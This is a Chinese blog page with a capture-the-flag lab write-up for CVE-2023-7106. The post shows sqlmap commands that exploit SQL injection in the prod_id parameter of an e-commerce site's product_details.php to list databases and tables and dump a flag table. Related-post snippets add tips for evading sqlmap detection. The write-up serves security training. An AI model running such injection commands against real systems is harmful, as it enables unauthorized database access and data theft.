【春秋云镜】CVE-2023-7106标靶Wp

最新推荐文章于 2025-07-23 21:29:35 发布
最新推荐文章于 2025-07-23 21:29:35 发布
阅读量684 收藏 3
点赞数 9
CC 4.0 BY-SA版权
分类专栏: 春秋云镜WriteUp 文章标签: 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/KKleeeaa/article/details/137207854
文章讲述了如何使用SQL注入工具SQLmap对一个名为product_details.php的页面进行操作,包括获取当前数据库、查询库名、查找表并尝试获取Flag。作者展示了在prod_id参数下执行的一系列攻击步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01:漏洞点

老样子先,看看标题介绍奥

ok了解到了 我们现在要知道参数是prod_id,路径为/pages/product_details.php

0x02:操作

直接打开SQLmap一把梭

sqlmap -u {URL}/pages/product_details.php?prod_id=1 --current-db

这里的是查看数据库,奥

这里的话当前库是MySQL,后面实际测的时候那个库在electricks里面

sqlmap -u {URL}/pages/product_details.php?prod_id=1 --dbs

这串就是查询库名

然后直接查询表

sqlmap -u {URL}/pages/product_details.php?prod_id=1 -D electricks --tables

直接爆出来吧我的Flag!!!!!

sqlmap -u {URL}/pages/product_details.php?prod_id=1 -D electricks -T flllaaaag --dump

春秋 CVE-2023-7107 页面设置了cookie验证的sql注入
qq274575499的博客
04-10 1288
E-Commerce Website 1.0 允许通过“/pages/user_signup.php”中的参数‘firstname’、‘middlename’、‘email’、‘address’、‘contact’和‘username’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。
春秋CVE-2023-51048 SCMS v5.0 SQL注入漏洞
RisingFan的博客
04-19 1292
春秋CVE-2023-51048 SCMS v5.0 SQL注入漏洞
春秋 CVE-2023-7106
qq274575499的博客
04-10 713
E-Commerce Website 1.0 允许通过“/pages/product_details.php”中的参数“prod_id”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。
春秋CVE-2023-7106
2303_76653367的博客
03-28 337
E-Commerce Website 1.0 允许通过“/pages/product_details.php”中的参数“prod_id”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。
CVE-2023-7107
m0_74347812的博客
04-23 193
提示说的是在E-Commerce Website 1.0 允许通过“/pages/user_signup.php”中的参数‘firstname’、‘middlename’、‘email’、‘address’、‘contact’和‘username’进行 SQL 注入。save item保存,(发现目标设置了 Cookie 身份认证,使用 sqlmap 时需写入 Cookie,同时添加 User - Agent 字段,防止因明显的 sqlmap 客户端标识被识别,导致攻击中断)得到列名flag,爆字段。
春秋境 | SQL | CVE-2023-7106
weixin_68416970的博客
08-12 794
E-Commerce Website 1.0 允许通过“/pages/product_details.php”中的参数“prod_id”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。
春秋CVE-2023-7107
2303_76653367的博客
05-09 719
3.保存POST包到sqlmap里跑,设置user-agent与cookie,爆库。2.填写注册信息并抓包。
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
春秋CVE-2022-4230 夺旗
05-02
### 春秋CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
2023年,OpenSSH发现了一个名为CVE-2023-38408的安全漏洞,这个漏洞可能允许攻击者在特定条件下绕过身份验证或执行未授权的操作,对系统安全构成威胁。为了保护您的系统不受此漏洞影响,及时升级到OpenSSH 9.5p1...
春秋境靶场之CVE-2023-7107
sjh0590的博客
09-19 455
春秋境靶场之CVE-2023-7107的攻克过程
春秋境 | SQL | CVE-2023-7107
weixin_68416970的博客
08-11 617
E-Commerce Website 1.0 允许通过“/pages/user_signup.php”中的参数‘firstname’、‘middlename’、‘email’、‘address’、‘contact’和‘username’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。
春秋CVE-2023-52064标靶Wp
KKleeeaa的博客
04-01 887
因为这个是WuZhiCMS,然后这里刚好我的博客里面介绍了有一个Day,不知道的小伙半,可以看看我的漏洞复现的文章,里面有个五指CMS的文章哦。这里抓包 把GET数据包 用SQLmap跑,这里注意下,GET数据包里,keyword=1* 其余删掉 后面的。然后直接上Day,有day就打day奥,打出来数据库为wuzhicms,不用我多说了吧直接flag展示奥。弱密码自己猜测奥,锻炼你自己,可以通过信息收集查询奥,小伙伴们加油!输入来篡改SQL语句的结构,执行恶意的SQL命令。这里直接弱密码,尝试进去后台。
网络初级安全第三次作业
2302_81663869的博客
07-22 473
通用容器标签,用于分组其他元素,便于通过 CSS 统一样式或通过 JavaScript 操作。一级标题标签,用于显示页面的主要标题(此处为 “账户登录”),具有语义化含义,也影响搜索引擎排名。包含 CSS 样式代码,用于控制页面元素的布局和外观(如颜色、大小、间距等)。包含 JavaScript 代码,用于实现交互逻辑(如表单验证、提交处理等)。包含页面的元数据(不直接显示在页面上的信息),如字符集、标题、样式等。定义页面标题,显示在浏览器标签页上,也用于搜索引擎索引。表单标签,用于创建用户输入表单。
4G车载录像机的作用详解:提升行车安全与智能管理的核心技术
索迪迈科技
07-22 629
随着物流运输、公共交通、特种车辆等行业对安全与管理需求的提升,4G车载录像机已成为现代车辆智能化管理的重要组成部分。它不仅具备传统行车记录仪的录像功能,还结合4G无线通信、AI智能分析、GPS定位、存储等技术,实现远程监控、实时调度、驾驶员行为管理等功能。本文将详细解析4G车载录像机的作用,涵盖其在安全管理、车队运营、事故处理、数据管理等方面的核心价值。
Web LLM 安全剖析:以间接提示注入为核心的攻击案例与防御体系
聚焦实战技术的 “白话解读” 和入门级操作指南。
07-21 1142
LLM面临提示注入(含直接和间接,间接可通过外部源植入恶意指令)、训练数据中毒(污染训练数据致输出错误信息)、敏感数据泄露(被诱导泄露训练数据中敏感信息)等攻击;实战中可通过评论注入指令、利用不安全输出等方式实施攻击。防御需强化API权限(加身份验证,由应用控权限)、管好敏感数据(清理训练数据、给LLM最小权限)、不依赖提示词防御(需技术手段)。
​​SBOM 软件供应链安全(转)
最新发布
xdpcxq的专栏
07-23 483
摘要:随着开源组件在软件开发中的广泛应用,软件供应链安全问题日益突出。SBOM(软件物料清单)作为治理供应链安全的关键工具,通过记录组件、版本、许可证等核心信息提升软件透明度。目前主流SBOM格式包括SPDX、CycloneDX和SWID,分别适用于复杂供应链、安全审计和嵌入式场景。国际实践方面,美国通过行政令强制要求SBOM,亚太地区也逐步推进政策落地。实施SBOM需结合自动化工具(如Syft)和管理平台,并遵循NTIA定义的最小数据集标准,以应对组件漏洞、许可证风险等问题。SBOM已成为ISO/IEC2
自动化与安全 - 将 Terraform 集成到 CI/CD
weixin_42587823的博客
07-21 1042
今天,我们为整个 IaC 的实践旅程画上了完美的句号。我们把之前所有学到的知识——HCL 语法、模块化、远程状态管理——全部串联起来,并将其置于一个自动化、安全、且遵循 SRE 最佳实践的 CI/CD 流水线之中。
春秋CVE-2023-38836
06-15
很抱歉,由于安全性和隐私保护原则,我无法提供详细的CVE(Common Vulnerabilities and Exposures)报告或漏洞分析,尤其是对于特定的漏洞如春秋CVE-2023-38836。CVE是一个由美国国家网络安全中心维护的系统,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值